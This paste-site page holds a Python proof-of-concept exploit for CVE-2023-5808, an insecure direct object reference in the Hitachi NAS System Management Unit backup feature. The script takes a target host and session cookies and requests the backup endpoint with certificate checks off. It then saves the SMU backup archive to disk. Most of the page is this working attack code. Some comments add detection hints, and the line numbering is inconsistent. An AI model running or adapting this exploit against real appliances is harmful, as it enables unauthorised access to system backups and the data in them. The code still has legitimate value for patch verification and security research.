FlyFar

Hitachi NAS (HNAS) System Management Unit (SMU) Backup & Restore < 14.8.7825.01 - IDOR

Mar 12th, 2024
Python 2.95 KB | Cybersecurity | 0 0
  1. #!/usr/bin/python3
  2. #
  3. # Title:            Hitachi NAS (HNAS) System Management Unit (SMU) Backup & Restore IDOR Vulnerability
  4. # CVE:              CVE-2023-5808
  5. # Date:             2023-12-13
  6. # Exploit Author:   Arslan Masood (@arszilla)
  7. # Vendor:           https://www.hitachivantara.com/
  8. # Version:          < 14.8.7825.01
  9. # Tested On:        13.9.7021.04        
  10.  
  11. import argparse
  12. from datetime import datetime
  13. from os import getcwd
  14.  
  15. import requests
  16.  
# Command-line interface: the target SMU address plus the two session cookies
# of an already-authenticated session.
# NOTE(review): values passed as arguments end up in shell history and in the
# process list, so the session they belong to should be treated as exposed
# and logged out once the check is done.
parser = argparse.ArgumentParser(
    usage="./CVE-2023-5808.py --host <Hostname/FQDN/IP> --id <JSESSIONID> --sso <JSESSIONIDSSO>",
    description="CVE-2023-5808 PoC",
)

# All three options are mandatory strings and differ only in flag and help text.
for option_flag, option_help in (
    ("--host", "Hostname/FQDN/IP Address. Provide the port, if necessary, i.e. 127.0.0.1:8443, example.com:8443"),
    ("--id", "JSESSIONID cookie value"),
    ("--sso", "JSESSIONIDSSO cookie value"),
):
    parser.add_argument(option_flag, required=True, type=str, help=option_help)

# Parsed at module level, so importing this file also consumes sys.argv.
args = parser.parse_args()
  47.  
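def download_file(hostname, jsessionid, jsessionidsso):
    """Request the SMU backup archive and save it in the current directory.

    Sends one GET to the backup screen of the SMU web application using the
    supplied session cookies and writes the response body to a timestamped
    ``smu_backup-*.zip`` file. The header of this file lists builds before
    14.8.7825.01 as affected (CVE-2023-5808, tested on 13.9.7021.04).

    The page labels the issue an IDOR, i.e. the endpoint hands the backup to
    a session that should not be authorised for it; which roles are affected
    is not shown here, so confirm against the vendor advisory. For detection,
    GET requests to the ``BackupSmuScreen.vm`` path below are what to look
    for in the SMU or reverse-proxy access logs.

    Args:
        hostname: Host name, FQDN or IP of the SMU, with ``:port`` if needed.
        jsessionid: Value of the ``JSESSIONID`` cookie.
        jsessionidsso: Value of the ``JSESSIONIDSSO`` cookie.

    Raises:
        requests.HTTPError: The server answered with a 4xx/5xx status; no
            file is written in that case.
    """
    # Timestamped name so repeated runs do not overwrite each other
    # (minute resolution only).
    filename = f"smu_backup-{datetime.now().strftime('%Y-%m-%d_%H%M')}.zip"

    # Backup endpoint named by the advisory title ("Backup & Restore").
    smu_url = f"https://{hostname}/mgr/app/template/simple%2CBackupSmuScreen.vm/password/"

    # Session cookies of the authenticated user.
    smu_cookies = {
        "JSESSIONID":       jsessionid,
        "JSESSIONIDSSO":    jsessionidsso
        }

    # Browser-like headers; whether the server requires any of them
    # (the Referer in particular) is not shown here.
    smu_headers = {
        "User-Agent":                   "Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0",
        "Accept":                       "text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8",
        "Accept-Language":              "en-US,en;q=0.5",
        "Accept-Encoding":              "gzip, deflate",
        "Dnt":                          "1",
        "Referer":                      f"https://{hostname}/mgr/app/action/admin.SmuBackupRestoreAction/eventsubmit_doperform/ignored",
        "Upgrade-Insecure-Requests":    "1",
        "Sec-Fetch-Dest":               "document",
        "Sec-Fetch-Mode":               "navigate",
        "Sec-Fetch-Site":               "same-origin",
        "Sec-Fetch-User":               "?1",
        "Te":                           "trailers",
        "Connection":                   "close"
        }

    # verify=False turns off TLS certificate validation, so the session
    # cookies can be intercepted on an untrusted network path; run this from
    # the management network only. The timeout stops an unresponsive host
    # from hanging the script indefinitely.
    with requests.get(smu_url, headers=smu_headers, cookies=smu_cookies, stream=True, verify=False, timeout=30) as file_download:
        # Without this check an error page would be saved as a ".zip" and
        # reported as a successful download.
        file_download.raise_for_status()

        with open(filename, 'wb') as backup_archive:
            # stream=True only helps if the body is consumed in chunks;
            # reading .content would load the whole archive into memory.
            for chunk in file_download.iter_content(chunk_size=65536):
                backup_archive.write(chunk)

    # A 2xx status does not prove the body is a backup archive (a login or
    # error page can also come back with 200); inspect the saved file before
    # recording the host as affected.
    print(f"{filename} has been downloaded to {getcwd()}")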
  85.  
# Script entry point: hand the parsed command-line values to the download routine.
if __name__ == "__main__":
    target_host, session_cookie, sso_cookie = args.host, args.id, args.sso
    download_file(target_host, session_cookie, sso_cookie)
  88.            